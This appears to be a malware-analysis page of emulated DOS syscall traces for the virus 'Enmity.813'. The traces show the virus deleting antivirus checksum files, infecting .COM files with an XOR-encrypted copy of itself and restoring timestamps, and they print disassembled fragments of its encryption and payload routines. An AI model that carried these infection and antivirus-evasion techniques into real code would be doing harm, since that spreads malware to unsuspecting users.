Sample viewer

vx.netlux.org/Virus.DOS.Enmity.813

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:32:34.615948761Z 26 PC: 12a7e | Set disk transfer address
2018-12-17T22:32:34.617854637Z 71 PC: 12a88 | Get current directory
2018-12-17T22:32:34.621114163Z 67 PC: 12cd4 | Get or set file attributes
2018-12-17T22:32:34.627020177Z 65 PC: 12cd8 | Delete file (Filename = 'ANTI-VIR.DAT')
2018-12-17T22:32:34.633404598Z 67 PC: 12cd4 | Get or set file attributes
2018-12-17T22:32:34.639284454Z 65 PC: 12cd8 | Delete file (Filename = 'CHKLIST.MS')
2018-12-17T22:32:34.657541926Z 67 PC: 12cd4 | Get or set file attributes
2018-12-17T22:32:34.668235832Z 65 PC: 12cd8 | Delete file (Filename = 'CHKLIST.CPS')
2018-12-17T22:32:34.679955396Z 67 PC: 12cd4 | Get or set file attributes
2018-12-17T22:32:34.685782651Z 65 PC: 12cd8 | Delete file (Filename = 'IVB.NTZ')
2018-12-17T22:32:34.691909612Z 78 PC: 12a90 | Find first file
2018-12-17T22:32:34.698738044Z 67 PC: 12b92 | Get or set file attributes
2018-12-17T22:32:34.714281992Z 61 PC: 12ba7 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:32:34.725840714Z 63 PC: 12bbc | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:32:34.732400465Z 66 PC: 12bf4 | Move file pointer
2018-12-17T22:32:34.733763523Z 63 PC: 12c0b | Read file or device (Read 7 bytes on handle 5)
2018-12-17T22:32:34.736190701Z 44 PC: 12c1f | Get time 0x12c1f: mov word ptr [bp + 0x40f], dx
0x12c23: mov cx, 0x15
0x12c26: lea dx, word ptr [bp + 0x105]
0x12c2a: pop ax
0x12c2b: int 0x21
0x12c2d: push ax
0x12c2e: push bp
0x12c2f: mov bp, sp
0x12c31: mov word ptr [bp + 2], 0x4001
0x12c36: pop bp
0x12c37: mov cx, 0x17b
0x12c3a: mov dx, word ptr [bp + 0x40f]
0x12c3e: lea si, word ptr [bp + 0x11a]
0x12c42: lea di, word ptr [bp + 0x4e7]
0x12c46: lodsw ax, word ptr [si]
0x12c47: xor ax, dx
0x12c49: stosw word ptr es:[di], ax
0x12c4a: loop 0x12c46
0x12c4c: mov cx, 0x2f5
0x12c4f: lea dx, word ptr [bp + 0x4e7]
2018-12-17T22:32:34.738878061Z 64 PC: 12c2d | Write file or device (Write 21 bytes on handle 5)
2018-12-17T22:32:34.741530367Z 64 PC: 12c61 | Write file or device (Write 757 bytes on handle 5)
2018-12-17T22:32:34.750636301Z 64 PC: 12c6b | Write file or device (Write 35 bytes on handle 5)
2018-12-17T22:32:34.754372289Z 66 PC: 12c7d | Move file pointer
2018-12-17T22:32:34.756243461Z 64 PC: 12c87 | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:32:34.76303341Z 87 PC: 12c9c | Get or set file date and time
2018-12-17T22:32:34.765808744Z 62 PC: 12ca0 | Close file
2018-12-17T22:32:34.773514989Z 67 PC: 12caf | Get or set file attributes
2018-12-17T22:32:34.778415173Z 79 PC: 12a90 | Find next file
2018-12-17T22:32:34.782206304Z 79 PC: 12a90 | Find next file
2018-12-17T22:32:34.784845656Z 67 PC: 12b92 | Get or set file attributes
2018-12-17T22:32:34.795095421Z 61 PC: 12ba7 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:32:34.802646971Z 63 PC: 12bbc | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:32:34.808690522Z 66 PC: 12bf4 | Move file pointer
2018-12-17T22:32:34.810483823Z 63 PC: 12c0b | Read file or device (Read 7 bytes on handle 5)
2018-12-17T22:32:34.815839057Z 44 PC: 12c1f | Get time 0x12c1f: mov word ptr [bp + 0x40f], dx
0x12c23: mov cx, 0x15
0x12c26: lea dx, word ptr [bp + 0x105]
0x12c2a: pop ax
0x12c2b: int 0x21
0x12c2d: push ax
0x12c2e: push bp
0x12c2f: mov bp, sp
0x12c31: mov word ptr [bp + 2], 0x4001
0x12c36: pop bp
0x12c37: mov cx, 0x17b
0x12c3a: mov dx, word ptr [bp + 0x40f]
0x12c3e: lea si, word ptr [bp + 0x11a]
0x12c42: lea di, word ptr [bp + 0x4e7]
0x12c46: lodsw ax, word ptr [si]
0x12c47: xor ax, dx
0x12c49: stosw word ptr es:[di], ax
0x12c4a: loop 0x12c46
0x12c4c: mov cx, 0x2f5
0x12c4f: lea dx, word ptr [bp + 0x4e7]
2018-12-17T22:32:34.818455289Z 64 PC: 12c2d | Write file or device (Write 21 bytes on handle 5)
2018-12-17T22:32:34.821908916Z 64 PC: 12c61 | Write file or device (Write 757 bytes on handle 5)
2018-12-17T22:32:34.830908982Z 64 PC: 12c6b | Write file or device (Write 35 bytes on handle 5)
2018-12-17T22:32:34.834218876Z 66 PC: 12c7d | Move file pointer
2018-12-17T22:32:34.835887092Z 64 PC: 12c87 | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:32:34.842573335Z 87 PC: 12c9c | Get or set file date and time
2018-12-17T22:32:34.84480802Z 62 PC: 12ca0 | Close file
2018-12-17T22:32:34.852488293Z 67 PC: 12caf | Get or set file attributes
2018-12-17T22:32:34.85709346Z 79 PC: 12a90 | Find next file
2018-12-17T22:32:34.86027813Z 67 PC: 12b92 | Get or set file attributes
2018-12-17T22:32:34.869831269Z 61 PC: 12ba7 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:32:34.876332667Z 63 PC: 12bbc | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:32:34.883697121Z 66 PC: 12bf4 | Move file pointer
2018-12-17T22:32:34.885287761Z 63 PC: 12c0b | Read file or device (Read 7 bytes on handle 5)
2018-12-17T22:32:34.887955516Z 44 PC: 12c1f | Get time 0x12c1f: mov word ptr [bp + 0x40f], dx
0x12c23: mov cx, 0x15
0x12c26: lea dx, word ptr [bp + 0x105]
0x12c2a: pop ax
0x12c2b: int 0x21
0x12c2d: push ax
0x12c2e: push bp
0x12c2f: mov bp, sp
0x12c31: mov word ptr [bp + 2], 0x4001
0x12c36: pop bp
0x12c37: mov cx, 0x17b
0x12c3a: mov dx, word ptr [bp + 0x40f]
0x12c3e: lea si, word ptr [bp + 0x11a]
0x12c42: lea di, word ptr [bp + 0x4e7]
0x12c46: lodsw ax, word ptr [si]
0x12c47: xor ax, dx
0x12c49: stosw word ptr es:[di], ax
0x12c4a: loop 0x12c46
0x12c4c: mov cx, 0x2f5
0x12c4f: lea dx, word ptr [bp + 0x4e7]
2018-12-17T22:32:34.890653131Z 64 PC: 12c2d | Write file or device (Write 21 bytes on handle 5)
2018-12-17T22:32:34.893449563Z 64 PC: 12c61 | Write file or device (Write 757 bytes on handle 5)
2018-12-17T22:32:34.901279906Z 64 PC: 12c6b | Write file or device (Write 35 bytes on handle 5)
2018-12-17T22:32:34.904414368Z 66 PC: 12c7d | Move file pointer
2018-12-17T22:32:34.905979603Z 64 PC: 12c87 | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:32:34.912613018Z 87 PC: 12c9c | Get or set file date and time
2018-12-17T22:32:34.915067676Z 62 PC: 12ca0 | Close file
2018-12-17T22:32:34.922909575Z 67 PC: 12caf | Get or set file attributes
2018-12-17T22:32:34.927957614Z 79 PC: 12a90 | Find next file
2018-12-17T22:32:34.931038331Z 67 PC: 12b92 | Get or set file attributes
2018-12-17T22:32:34.940624248Z 61 PC: 12ba7 | Open file (Filename = 'PHANG.COM')
2018-12-17T22:32:34.947664909Z 63 PC: 12bbc | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:32:34.954779298Z 66 PC: 12bf4 | Move file pointer
2018-12-17T22:32:34.956124029Z 63 PC: 12c0b | Read file or device (Read 7 bytes on handle 5)
2018-12-17T22:32:34.958459179Z 44 PC: 12c1f | Get time 0x12c1f: mov word ptr [bp + 0x40f], dx
0x12c23: mov cx, 0x15
0x12c26: lea dx, word ptr [bp + 0x105]
0x12c2a: pop ax
0x12c2b: int 0x21
0x12c2d: push ax
0x12c2e: push bp
0x12c2f: mov bp, sp
0x12c31: mov word ptr [bp + 2], 0x4001
0x12c36: pop bp
0x12c37: mov cx, 0x17b
0x12c3a: mov dx, word ptr [bp + 0x40f]
0x12c3e: lea si, word ptr [bp + 0x11a]
0x12c42: lea di, word ptr [bp + 0x4e7]
0x12c46: lodsw ax, word ptr [si]
0x12c47: xor ax, dx
0x12c49: stosw word ptr es:[di], ax
0x12c4a: loop 0x12c46
0x12c4c: mov cx, 0x2f5
0x12c4f: lea dx, word ptr [bp + 0x4e7]
2018-12-17T22:32:34.96111768Z 64 PC: 12c2d | Write file or device (Write 21 bytes on handle 5)
2018-12-17T22:32:34.963842437Z 64 PC: 12c61 | Write file or device (Write 757 bytes on handle 5)
2018-12-17T22:32:34.971631443Z 64 PC: 12c6b | Write file or device (Write 35 bytes on handle 5)
2018-12-17T22:32:34.974708927Z 66 PC: 12c7d | Move file pointer
2018-12-17T22:32:34.975991103Z 64 PC: 12c87 | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:32:34.982279274Z 87 PC: 12c9c | Get or set file date and time
2018-12-17T22:32:34.98426212Z 62 PC: 12ca0 | Close file
2018-12-17T22:32:34.992030519Z 67 PC: 12caf | Get or set file attributes
2018-12-17T22:32:34.998490506Z 79 PC: 12a90 | Find next file
2018-12-17T22:32:35.001870263Z 67 PC: 12b92 | Get or set file attributes
2018-12-17T22:32:35.012040245Z 61 PC: 12ba7 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:32:35.018420551Z 63 PC: 12bbc | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:32:35.025651329Z 66 PC: 12bf4 | Move file pointer
2018-12-17T22:32:35.027300374Z 63 PC: 12c0b | Read file or device (Read 7 bytes on handle 5)
2018-12-17T22:32:35.030209233Z 44 PC: 12c1f | Get time 0x12c1f: mov word ptr [bp + 0x40f], dx
0x12c23: mov cx, 0x15
0x12c26: lea dx, word ptr [bp + 0x105]
0x12c2a: pop ax
0x12c2b: int 0x21
0x12c2d: push ax
0x12c2e: push bp
0x12c2f: mov bp, sp
0x12c31: mov word ptr [bp + 2], 0x4001
0x12c36: pop bp
0x12c37: mov cx, 0x17b
0x12c3a: mov dx, word ptr [bp + 0x40f]
0x12c3e: lea si, word ptr [bp + 0x11a]
0x12c42: lea di, word ptr [bp + 0x4e7]
0x12c46: lodsw ax, word ptr [si]
0x12c47: xor ax, dx
0x12c49: stosw word ptr es:[di], ax
0x12c4a: loop 0x12c46
0x12c4c: mov cx, 0x2f5
0x12c4f: lea dx, word ptr [bp + 0x4e7]
2018-12-17T22:32:35.032698625Z 64 PC: 12c2d | Write file or device (Write 21 bytes on handle 5)
2018-12-17T22:32:35.036507769Z 64 PC: 12c61 | Write file or device (Write 757 bytes on handle 5)
2018-12-17T22:32:35.044358692Z 64 PC: 12c6b | Write file or device (Write 35 bytes on handle 5)
2018-12-17T22:32:35.047182733Z 66 PC: 12c7d | Move file pointer
2018-12-17T22:32:35.050384202Z 64 PC: 12c87 | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:32:35.057400418Z 87 PC: 12c9c | Get or set file date and time
2018-12-17T22:32:35.059132976Z 62 PC: 12ca0 | Close file
2018-12-17T22:32:35.067307066Z 67 PC: 12caf | Get or set file attributes
2018-12-17T22:32:35.0722726Z 79 PC: 12a90 | Find next file
2018-12-17T22:32:35.07521203Z 67 PC: 12b92 | Get or set file attributes
2018-12-17T22:32:35.085758954Z 61 PC: 12ba7 | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:32:35.092347172Z 63 PC: 12bbc | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:32:35.099474098Z 66 PC: 12bf4 | Move file pointer
2018-12-17T22:32:35.10231599Z 63 PC: 12c0b | Read file or device (Read 7 bytes on handle 5)
2018-12-17T22:32:35.104825167Z 44 PC: 12c1f | Get time 0x12c1f: mov word ptr [bp + 0x40f], dx
0x12c23: mov cx, 0x15
0x12c26: lea dx, word ptr [bp + 0x105]
0x12c2a: pop ax
0x12c2b: int 0x21
0x12c2d: push ax
0x12c2e: push bp
0x12c2f: mov bp, sp
0x12c31: mov word ptr [bp + 2], 0x4001
0x12c36: pop bp
0x12c37: mov cx, 0x17b
0x12c3a: mov dx, word ptr [bp + 0x40f]
0x12c3e: lea si, word ptr [bp + 0x11a]
0x12c42: lea di, word ptr [bp + 0x4e7]
0x12c46: lodsw ax, word ptr [si]
0x12c47: xor ax, dx
0x12c49: stosw word ptr es:[di], ax
0x12c4a: loop 0x12c46
0x12c4c: mov cx, 0x2f5
0x12c4f: lea dx, word ptr [bp + 0x4e7]
2018-12-17T22:32:35.107051412Z 64 PC: 12c2d | Write file or device (Write 21 bytes on handle 5)
2018-12-17T22:32:35.115546374Z 64 PC: 12c61 | Write file or device (Write 757 bytes on handle 5)
2018-12-17T22:32:35.123498788Z 64 PC: 12c6b | Write file or device (Write 35 bytes on handle 5)
2018-12-17T22:32:35.126006242Z 66 PC: 12c7d | Move file pointer
2018-12-17T22:32:35.128295057Z 64 PC: 12c87 | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:32:35.135274532Z 87 PC: 12c9c | Get or set file date and time
2018-12-17T22:32:35.136719893Z 62 PC: 12ca0 | Close file
2018-12-17T22:32:35.147796557Z 67 PC: 12caf | Get or set file attributes
2018-12-17T22:32:35.153242311Z 79 PC: 12a90 | Find next file
2018-12-17T22:32:35.15630887Z 67 PC: 12b92 | Get or set file attributes
2018-12-17T22:32:35.167232649Z 61 PC: 12ba7 | Open file (Filename = 'PAH.COM')
2018-12-17T22:32:35.174200076Z 63 PC: 12bbc | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:32:35.180959074Z 66 PC: 12bf4 | Move file pointer
2018-12-17T22:32:35.182767834Z 63 PC: 12c0b | Read file or device (Read 7 bytes on handle 5)
2018-12-17T22:32:35.184496254Z 44 PC: 12c1f | Get time 0x12c1f: mov word ptr [bp + 0x40f], dx
0x12c23: mov cx, 0x15
0x12c26: lea dx, word ptr [bp + 0x105]
0x12c2a: pop ax
0x12c2b: int 0x21
0x12c2d: push ax
0x12c2e: push bp
0x12c2f: mov bp, sp
0x12c31: mov word ptr [bp + 2], 0x4001
0x12c36: pop bp
0x12c37: mov cx, 0x17b
0x12c3a: mov dx, word ptr [bp + 0x40f]
0x12c3e: lea si, word ptr [bp + 0x11a]
0x12c42: lea di, word ptr [bp + 0x4e7]
0x12c46: lodsw ax, word ptr [si]
0x12c47: xor ax, dx
0x12c49: stosw word ptr es:[di], ax
0x12c4a: loop 0x12c46
0x12c4c: mov cx, 0x2f5
0x12c4f: lea dx, word ptr [bp + 0x4e7]
2018-12-17T22:32:35.186109231Z 64 PC: 12c2d | Write file or device (Write 21 bytes on handle 5)
2018-12-17T22:32:35.189212365Z 64 PC: 12c61 | Write file or device (Write 757 bytes on handle 5)
2018-12-17T22:32:35.195924857Z 64 PC: 12c6b | Write file or device (Write 35 bytes on handle 5)
2018-12-17T22:32:35.198581031Z 66 PC: 12c7d | Move file pointer
2018-12-17T22:32:35.200212005Z 64 PC: 12c87 | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:32:35.204711789Z 87 PC: 12c9c | Get or set file date and time
2018-12-17T22:32:35.205852416Z 62 PC: 12ca0 | Close file
2018-12-17T22:32:35.214703699Z 67 PC: 12caf | Get or set file attributes
2018-12-17T22:32:35.218523986Z 79 PC: 12a90 | Find next file
2018-12-17T22:32:35.221137631Z 67 PC: 12b92 | Get or set file attributes
2018-12-17T22:32:35.231287674Z 61 PC: 12ba7 | Open file (Filename = 'TEST.COM')
2018-12-17T22:32:35.23768968Z 63 PC: 12bbc | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:32:35.244343196Z 87 PC: 12c9c | Get or set file date and time
2018-12-17T22:32:35.246850937Z 62 PC: 12ca0 | Close file
2018-12-17T22:32:35.25483214Z 67 PC: 12caf | Get or set file attributes
2018-12-17T22:32:35.25966368Z 79 PC: 12a90 | Find next file
2018-12-17T22:32:35.263087625Z 59 PC: 12aa1 | Change current directory
2018-12-17T22:32:35.267792437Z 71 PC: 12abe | Get current directory
2018-12-17T22:32:35.275486799Z 59 PC: 12ae8 | Change current directory
2018-12-17T22:32:35.289246915Z 59 PC: 12b03 | Change current directory
2018-12-17T22:32:35.290947354Z 44 PC: 12b07 | Get time 0x12b07: cmp dx, 5
0x12b0a: ja 0x12b2e
0x12b0c: mov ax, 0xd
0x12b0f: int 0x10
0x12b11: lea si, word ptr [bp + 0x3a4]
0x12b15: cld
0x12b16: lodsb al, byte ptr [si]
0x12b17: or al, al
0x12b19: je 0x12b25
0x12b1b: mov ah, 0xe
0x12b1d: xor bh, bh
0x12b1f: mov bl, 5
0x12b21: int 0x10
0x12b23: jmp 0x12b15
0x12b25: xor ax, ax
0x12b27: int 0x16
0x12b29: mov ax, 3
0x12b2c: int 0x10
0x12b2e: push ax
0x12b2f: push bp
2018-12-17T22:32:35.292961798Z 26 PC: 12b3e | Set disk transfer address

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":5819,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:55:27.41160059Z 26 PC: 12a7e | Set disk transfer address
2018-12-25T11:55:27.413750379Z 71 PC: 12a88 | Get current directory
2018-12-25T11:55:27.416750707Z 67 PC: 12cd4 | Get or set file attributes
2018-12-25T11:55:27.42244474Z 65 PC: 12cd8 | Delete file (Filename = 'ANTI-VIR.DAT')
2018-12-25T11:55:27.433446204Z 67 PC: 12cd4 | Get or set file attributes (See above)
2018-12-25T11:55:27.443877401Z 65 PC: 12cd8 | Delete file (See above)
2018-12-25T11:55:27.450283174Z 67 PC: 12cd4 | Get or set file attributes (See above)
2018-12-25T11:55:27.457457274Z 65 PC: 12cd8 | Delete file (See above)
2018-12-25T11:55:27.463131171Z 67 PC: 12cd4 | Get or set file attributes (See above)
2018-12-25T11:55:27.468558468Z 65 PC: 12cd8 | Delete file (See above)
2018-12-25T11:55:27.474114213Z 78 PC: 12a90 | Find first file
2018-12-25T11:55:27.480694214Z 67 PC: 12b92 | Get or set file attributes
2018-12-25T11:55:27.497147658Z 61 PC: 12ba7 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:55:27.504012681Z 63 PC: 12bbc | Read file or device (Read 5 bytes on handle 5)
2018-12-25T11:55:27.535410794Z 66 PC: 12bf4 | Move file pointer
2018-12-25T11:55:27.541348552Z 63 PC: 12c0b | Read file or device (Read 7 bytes on handle 5)
2018-12-25T11:55:27.549191818Z 44 PC: 12c1f | Get time 0x12c1f: mov word ptr [bp + 0x40f], dx
0x12c23: mov cx, 0x15
0x12c26: lea dx, word ptr [bp + 0x105]
0x12c2a: pop ax
0x12c2b: int 0x21
0x12c2d: push ax
0x12c2e: push bp
0x12c2f: mov bp, sp
0x12c31: mov word ptr [bp + 2], 0x4001
0x12c36: pop bp
0x12c37: mov cx, 0x17b
0x12c3a: mov dx, word ptr [bp + 0x40f]
0x12c3e: lea si, word ptr [bp + 0x11a]
0x12c42: lea di, word ptr [bp + 0x4e7]
0x12c46: lodsw ax, word ptr [si]
0x12c47: xor ax, dx
0x12c49: stosw word ptr es:[di], ax
0x12c4a: loop 0x12c46
0x12c4c: mov cx, 0x2f5
0x12c4f: lea dx, word ptr [bp + 0x4e7]
2018-12-25T11:55:27.553800733Z 64 PC: 12c2d | Write file or device (Write 21 bytes on handle 5)
2018-12-25T11:55:27.556915242Z 64 PC: 12c61 | Write file or device (Write 757 bytes on handle 5)
2018-12-25T11:55:27.566318515Z 64 PC: 12c6b | Write file or device (Write 35 bytes on handle 5)
2018-12-25T11:55:27.570106016Z 66 PC: 12c7d | Move file pointer
2018-12-25T11:55:27.571987691Z 64 PC: 12c87 | Write file or device (Write 5 bytes on handle 5)
2018-12-25T11:55:27.579990867Z 87 PC: 12c9c | Get or set file date and time
2018-12-25T11:55:27.582764545Z 62 PC: 12ca0 | Close file
2018-12-25T11:55:27.591257792Z 67 PC: 12caf | Get or set file attributes
2018-12-25T11:55:27.596251107Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:55:27.59943193Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:55:27.603368376Z 67 PC: 12b92 | Get or set file attributes (See above)
2018-12-25T11:55:27.613325018Z 61 PC: 12ba7 | Open file (See above)
2018-12-25T11:55:27.621033478Z 63 PC: 12bbc | Read file or device (See above)
2018-12-25T11:55:27.62824328Z 66 PC: 12bf4 | Move file pointer (See above)
2018-12-25T11:55:27.629956176Z 63 PC: 12c0b | Read file or device (See above)
2018-12-25T11:55:27.632706583Z 44 PC: 12c1f | Get time (See above)
2018-12-25T11:55:27.635680523Z 64 PC: 12c2d | Write file or device (See above)
2018-12-25T11:55:27.63858654Z 64 PC: 12c61 | Write file or device (See above)
2018-12-25T11:55:27.647094105Z 64 PC: 12c6b | Write file or device (See above)
2018-12-25T11:55:27.658622746Z 66 PC: 12c7d | Move file pointer (See above)
2018-12-25T11:55:27.660255021Z 64 PC: 12c87 | Write file or device (See above)
2018-12-25T11:55:27.666889774Z 87 PC: 12c9c | Get or set file date and time (See above)
2018-12-25T11:55:27.669059714Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T11:55:27.677035297Z 67 PC: 12caf | Get or set file attributes (See above)
2018-12-25T11:55:27.682976327Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:55:27.69739489Z 67 PC: 12b92 | Get or set file attributes (See above)
2018-12-25T11:55:27.706914299Z 61 PC: 12ba7 | Open file (See above)
2018-12-25T11:55:27.714036542Z 63 PC: 12bbc | Read file or device (See above)
2018-12-25T11:55:27.721170614Z 66 PC: 12bf4 | Move file pointer (See above)
2018-12-25T11:55:27.722574618Z 63 PC: 12c0b | Read file or device (See above)
2018-12-25T11:55:27.724922561Z 44 PC: 12c1f | Get time (See above)
2018-12-25T11:55:27.727677217Z 64 PC: 12c2d | Write file or device (See above)
2018-12-25T11:55:27.730596837Z 64 PC: 12c61 | Write file or device (See above)
2018-12-25T11:55:27.738349317Z 64 PC: 12c6b | Write file or device (See above)
2018-12-25T11:55:27.741713732Z 66 PC: 12c7d | Move file pointer (See above)
2018-12-25T11:55:27.743197139Z 64 PC: 12c87 | Write file or device (See above)
2018-12-25T11:55:27.749631321Z 87 PC: 12c9c | Get or set file date and time (See above)
2018-12-25T11:55:27.752412249Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T11:55:27.75980644Z 67 PC: 12caf | Get or set file attributes (See above)
2018-12-25T11:55:27.764602468Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:55:27.767538548Z 67 PC: 12b92 | Get or set file attributes (See above)
2018-12-25T11:55:27.777290791Z 61 PC: 12ba7 | Open file (See above)
2018-12-25T11:55:27.784184779Z 63 PC: 12bbc | Read file or device (See above)
2018-12-25T11:55:27.790607216Z 66 PC: 12bf4 | Move file pointer (See above)
2018-12-25T11:55:27.791937304Z 63 PC: 12c0b | Read file or device (See above)
2018-12-25T11:55:27.794281346Z 44 PC: 12c1f | Get time (See above)
2018-12-25T11:55:27.796923193Z 64 PC: 12c2d | Write file or device (See above)
2018-12-25T11:55:27.79975702Z 64 PC: 12c61 | Write file or device (See above)
2018-12-25T11:55:27.807459326Z 64 PC: 12c6b | Write file or device (See above)
2018-12-25T11:55:27.810253471Z 66 PC: 12c7d | Move file pointer (See above)
2018-12-25T11:55:27.812258238Z 64 PC: 12c87 | Write file or device (See above)
2018-12-25T11:55:27.818685225Z 87 PC: 12c9c | Get or set file date and time (See above)
2018-12-25T11:55:27.820476643Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T11:55:27.829602879Z 67 PC: 12caf | Get or set file attributes (See above)
2018-12-25T11:55:27.834128859Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:55:27.836910144Z 67 PC: 12b92 | Get or set file attributes (See above)
2018-12-25T11:55:27.848012428Z 61 PC: 12ba7 | Open file (See above)
2018-12-25T11:55:27.85445513Z 63 PC: 12bbc | Read file or device (See above)
2018-12-25T11:55:27.860568713Z 66 PC: 12bf4 | Move file pointer (See above)
2018-12-25T11:55:27.862537632Z 63 PC: 12c0b | Read file or device (See above)
2018-12-25T11:55:27.865126319Z 44 PC: 12c1f | Get time (See above)
2018-12-25T11:55:27.867397653Z 64 PC: 12c2d | Write file or device (See above)
2018-12-25T11:55:27.871178841Z 64 PC: 12c61 | Write file or device (See above)
2018-12-25T11:55:27.878997362Z 64 PC: 12c6b | Write file or device (See above)
2018-12-25T11:55:27.881699926Z 66 PC: 12c7d | Move file pointer (See above)
2018-12-25T11:55:27.883939884Z 64 PC: 12c87 | Write file or device (See above)
2018-12-25T11:55:27.890540906Z 87 PC: 12c9c | Get or set file date and time (See above)
2018-12-25T11:55:27.892227587Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T11:55:27.90077653Z 67 PC: 12caf | Get or set file attributes (See above)
2018-12-25T11:55:27.90602081Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:55:27.908923811Z 67 PC: 12b92 | Get or set file attributes (See above)
2018-12-25T11:55:27.920556456Z 61 PC: 12ba7 | Open file (See above)
2018-12-25T11:55:27.927077317Z 63 PC: 12bbc | Read file or device (See above)
2018-12-25T11:55:27.933283718Z 66 PC: 12bf4 | Move file pointer (See above)
2018-12-25T11:55:27.935487446Z 63 PC: 12c0b | Read file or device (See above)
2018-12-25T11:55:27.937935999Z 44 PC: 12c1f | Get time (See above)
2018-12-25T11:55:27.940028629Z 64 PC: 12c2d | Write file or device (See above)
2018-12-25T11:55:27.948327067Z 64 PC: 12c61 | Write file or device (See above)
2018-12-25T11:55:27.956961009Z 64 PC: 12c6b | Write file or device (See above)
2018-12-25T11:55:27.959618986Z 66 PC: 12c7d | Move file pointer (See above)
2018-12-25T11:55:27.961885092Z 64 PC: 12c87 | Write file or device (See above)
2018-12-25T11:55:27.969103883Z 87 PC: 12c9c | Get or set file date and time (See above)
2018-12-25T11:55:27.97126509Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T11:55:27.979648774Z 67 PC: 12caf | Get or set file attributes (See above)
2018-12-25T11:55:27.985681999Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:55:27.988560007Z 67 PC: 12b92 | Get or set file attributes (See above)
2018-12-25T11:55:27.998318116Z 61 PC: 12ba7 | Open file (See above)
2018-12-25T11:55:28.009531792Z 63 PC: 12bbc | Read file or device (See above)
2018-12-25T11:55:28.015997206Z 66 PC: 12bf4 | Move file pointer (See above)
2018-12-25T11:55:28.017701077Z 63 PC: 12c0b | Read file or device (See above)
2018-12-25T11:55:28.02131618Z 44 PC: 12c1f | Get time (See above)
2018-12-25T11:55:28.023665918Z 64 PC: 12c2d | Write file or device (See above)
2018-12-25T11:55:28.026754315Z 64 PC: 12c61 | Write file or device (See above)
2018-12-25T11:55:28.035590187Z 64 PC: 12c6b | Write file or device (See above)
2018-12-25T11:55:28.041261312Z 66 PC: 12c7d | Move file pointer (See above)
2018-12-25T11:55:28.042924083Z 64 PC: 12c87 | Write file or device (See above)
2018-12-25T11:55:28.05062198Z 87 PC: 12c9c | Get or set file date and time (See above)
2018-12-25T11:55:28.052242852Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T11:55:28.062647462Z 67 PC: 12caf | Get or set file attributes (See above)
2018-12-25T11:55:28.067878089Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:55:28.070497413Z 67 PC: 12b92 | Get or set file attributes (See above)
2018-12-25T11:55:28.080050106Z 61 PC: 12ba7 | Open file (See above)
2018-12-25T11:55:28.087360085Z 63 PC: 12bbc | Read file or device (See above)
2018-12-25T11:55:28.093697758Z 87 PC: 12c9c | Get or set file date and time (See above)
2018-12-25T11:55:28.102767662Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T11:55:28.110471671Z 67 PC: 12caf | Get or set file attributes (See above)
2018-12-25T11:55:28.120195504Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:55:28.130144095Z 59 PC: 12aa1 | Change current directory
2018-12-25T11:55:28.134875944Z 71 PC: 12abe | Get current directory
2018-12-25T11:55:28.137625477Z 59 PC: 12ae8 | Change current directory
2018-12-25T11:55:28.14786366Z 59 PC: 12b03 | Change current directory
2018-12-25T11:55:28.15054453Z 44 PC: 12b07 | Get time 0x12b07: cmp dx, 5
0x12b0a: ja 0x12b2e
0x12b0c: mov ax, 0xd
0x12b0f: int 0x10
0x12b11: lea si, word ptr [bp + 0x3a4]
0x12b15: cld
0x12b16: lodsb al, byte ptr [si]
0x12b17: or al, al
0x12b19: je 0x12b25
0x12b1b: mov ah, 0xe
0x12b1d: xor bh, bh
0x12b1f: mov bl, 5
0x12b21: int 0x10
0x12b23: jmp 0x12b15
0x12b25: xor ax, ax
0x12b27: int 0x16
0x12b29: mov ax, 3
0x12b2c: int 0x10
0x12b2e: push ax
0x12b2f: push bp
2018-12-25T11:55:28.152641919Z 26 PC: 12b3e | Set disk transfer address

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":5819,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:55:27.53669829Z 26 PC: 12a7e | Set disk transfer address
2018-12-25T11:55:27.538267141Z 71 PC: 12a88 | Get current directory
2018-12-25T11:55:27.541197925Z 67 PC: 12cd4 | Get or set file attributes
2018-12-25T11:55:27.546721967Z 65 PC: 12cd8 | Delete file (Filename = 'ANTI-VIR.DAT')
2018-12-25T11:55:27.557356651Z 67 PC: 12cd4 | Get or set file attributes (See above)
